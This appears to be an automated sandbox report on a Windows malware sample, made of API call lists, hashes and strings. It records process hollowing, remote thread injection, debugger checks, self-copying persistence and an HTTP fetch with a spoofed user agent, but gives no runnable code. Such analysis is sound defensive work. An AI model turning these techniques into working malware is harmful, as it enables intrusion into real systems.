                                                                                                                                                                                                                        • Instruction ID: 53eb4b2ed5134a00650b3239a711a1d5b69a32d218cbb6b9accb09e138e5b4bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 050d37452dd759e247bdf19fa3a42402d7886e86b0f855129783af495c2ea865
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFD01237A0001456CB245A7AB80A6DDBB38FBD0231F09847BE545D7140DA2085668755
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000006.00000002.1723357300.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_53d0000_F72F.jbxd

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:41.7%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:480
                                                                                                                                                                                                                        Total number of Limit Nodes:12

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: 9ed2f4a03b1e77c642c8ce9e68d8b0e50f1c48e3ba166c1d4b396193836a5a1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B32D972608BC186E774DF15E8547AAB7A1FB88B85F404235DACE83B58DF3CE8448B04

                                                                                                                                                                                                                        Control-flow Graph

[Control-flow graph, nodes 297 to 363, entry at 7ff6c5db340c; legend: Executed / Not Executed. API calls labelled on the nodes: ExitProcess, Sleep, CreateThread (3 calls), WaitForMultipleObjects.]
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction ID: 34039160ea9d1361086e9d499959d6618fca35807634c7ef57284e22eb60ba32
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6611821A1DB8281FB64BF21AC5537A22A2AF44B43F400336D4CEC66A5DE2DFD49D718

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: 87982dc577717b87cb5bc53c93f1d1a9e77f02be9fdc8ad2655ab5ca000d67d3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89311932A19B8186D750DF15E85072AB766FBD4B82F101235FACE87B68DF3CE8418B04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6C5DB3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetVolumeInformationW.KERNELBASE ref: 00007FF6C5DB37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: wsprintfW.USER32 ref: 00007FF6C5DB3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction ID: caaae042a56b6acba86239622576b9b12ec539095b67a3538940a9f83826d976
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75111521628A8685DB60AF25FC5476A6362FBC4B85F405231D58EC3B69DF3CE844C748

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6C5DB3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: GetVolumeInformationW.KERNELBASE ref: 00007FF6C5DB37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3704: wsprintfW.USER32 ref: 00007FF6C5DB3862
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF6C5DB3A79
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF6C5DB3A84
                                                                                                                                                                                                                        • CopyFileW.KERNELBASE ref: 00007FF6C5DB3A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF6C5DB3AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: ecbe3fc6cb2ab480d5b01da4182260b38b741ba168c031364035396052de7fcc
                                                                                                                                                                                                                        • Instruction ID: 969ee2de46d75fede48438f545b482bb72fe615f0608bb29eb3c6ac52a75cccb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecbe3fc6cb2ab480d5b01da4182260b38b741ba168c031364035396052de7fcc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97019B61B1868293DF50EF24EC503AA5361FB84B45F905231D28DC35E4EF3CEA49CB04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: 18c9e638ef3a06555367ee7c6b1048842a8f8ce513b2bc0cde416047296fdc81
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA31F82661C6C186D730EF64E8983AAB3A1FB94B45F400236E2CDC7A58DF7DD949CB05

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction ID: 1e7462af3a8cad9654bf686fe86bb88dd2fdc8b955315aefc8918146bc99bd51
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6f9905a68a37330863b423cf03472073815be279c54a0a408a746d7c81f1aaa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBF03424D0D38281EB306F25AC1433A27A6BB45F8AF040374D5CD86294CF2CFA49EB29

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 416 7ff6c5db14ec-7ff6c5db1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6C5DB15F1,?,?,?,?,?,?,?,?,00007FF6C5DB3418), ref: 00007FF6C5DB14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6C5DB15F1,?,?,?,?,?,?,?,?,00007FF6C5DB3418), ref: 00007FF6C5DB1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: c55a0b8a5ad5c9ef92017fc7f32be440d8016c24aa7fa68754d64a5b84d71409
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65E07E76508B8086C620AB15F84001AB7B4FB88B95B504225EACD82B28CF3CD5A58B04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 420 7ff6c5db3b14-7ff6c5db3b3a VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
• Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction ID: be7fec7f844d53f572c5c86b1e9db4e9841b03c2c4456fcfacb063d361ebfc87
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ed7f4f9e3a1e5303470ef457a719a49b487dd8a302f99ec74e3d8dd35d9eee5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74C080B1F27140C7D71CDF31E451B0F2A11B744741F504028D64257744CD3DD5514F04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 417 7ff6c5db3ae4-7ff6c5db3af3 418 7ff6c5db3af5-7ff6c5db3b02 VirtualFree 417->418 419 7ff6c5db3b08-7ff6c5db3b0c 417->419 418->419
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: dd4ef1dfff4d48ad5007379cba3b5bbd6db4a7d0e4e9ea571e90b4fc4f8b7175
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CD01221E39A4181E794AF26EC8971967A1FBC4B45F808139E6C981568CF3CE5D9CF08
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: eb79ed835b43c0abe1e1b6ab2cdd68dfb6c9b8bfeb96773e1b8c34c77d66b686
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F71DD3190CB8186E770AF55E85436AB7A2F784B85F504235D6CDC6B98EF7CE884CB44
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6C5DB219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: 14daa68a22086c7d0fb1a5577c391b4aabac9390c91e3708a259a738a495b5e1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6971FA36919B8182E7509F51F85472AB761FBC4B96F501235EACE87B68CF7CE8848B04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmp
